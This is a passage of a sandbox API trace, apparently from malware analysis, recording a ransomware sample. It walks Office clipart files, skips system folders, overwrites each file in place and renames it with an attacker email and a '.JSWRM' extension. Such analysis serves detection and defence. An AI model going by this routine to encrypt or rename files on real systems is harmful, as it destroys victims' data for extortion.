CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.791] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2232) returned 1 [0078.791] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b0) returned 0x20c6c0 [0078.791] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8b0, lpOverlapped=0x0) returned 1 [0078.793] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.793] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8b0, lpOverlapped=0x0) returned 1 [0078.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0078.793] CloseHandle (hObject=0x314) returned 1 [0078.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0078.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0078.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0078.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0078.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0078.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0078.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.794] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0078.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0078.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0078.794] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x402, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00235_.WMF", cAlternateFileName="")) returned 1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2=".") returned 1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="..") returned 1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="...") returned 1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="windows") returned -1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="recovery") returned -1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="perflogs") returned -1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="documents and settings") returned 1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="system volume information") returned -1 [0078.795] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="msocache") returned -1 [0078.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0078.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00235_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00235_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00235_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0078.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0078.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00235_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00235_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00235_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0078.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0078.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0078.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0078.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.795] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1026) returned 1 [0078.795] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x400) returned 0x230a00 [0078.796] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x400, lpOverlapped=0x0) returned 1 [0078.851] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.851] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x400, lpOverlapped=0x0) returned 1 [0078.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0078.852] CloseHandle (hObject=0x314) returned 1 [0078.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0078.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0078.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0078.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0078.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0078.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0078.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0078.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0078.852] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0078.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0078.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0078.853] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00236_.WMF", cAlternateFileName="")) returned 1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2=".") returned 1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="..") returned 1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="...") returned 1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="windows") returned -1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="recovery") returned -1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="perflogs") returned -1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="documents and settings") returned 1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="system volume information") returned -1 [0078.853] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="msocache") returned -1 [0078.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0078.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00236_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00236_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00236_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0078.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0078.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00236_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00236_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00236_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0078.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0078.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0078.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0078.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.854] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3286) returned 1 [0078.854] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcd0) returned 0x23fc98 [0078.854] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xcd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xcd0, lpOverlapped=0x0) returned 1 [0078.856] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.856] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xcd0, lpOverlapped=0x0) returned 1 [0078.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.856] CloseHandle (hObject=0x314) returned 1 [0078.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0078.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0078.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0078.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0078.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0078.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0078.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0078.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0078.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.857] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0078.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0078.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0078.857] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00241_.WMF", cAlternateFileName="")) returned 1 [0078.857] lstrcmpiW (lpString1="HH00241_.WMF", lpString2=".") returned 1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="..") returned 1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="...") returned 1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="windows") returned -1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="recovery") returned -1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="perflogs") returned -1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="documents and settings") returned 1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="system volume information") returned -1 [0078.858] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="msocache") returned -1 [0078.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0078.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00241_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00241_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00241_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0078.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0078.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00241_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00241_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00241_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0078.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0078.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0078.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0078.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.858] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1960) returned 1 [0078.858] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7a0) returned 0x20c6c0 [0078.859] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7a0, lpOverlapped=0x0) returned 1 [0078.860] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.860] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7a0, lpOverlapped=0x0) returned 1 [0078.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0078.860] CloseHandle (hObject=0x314) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0078.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0078.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 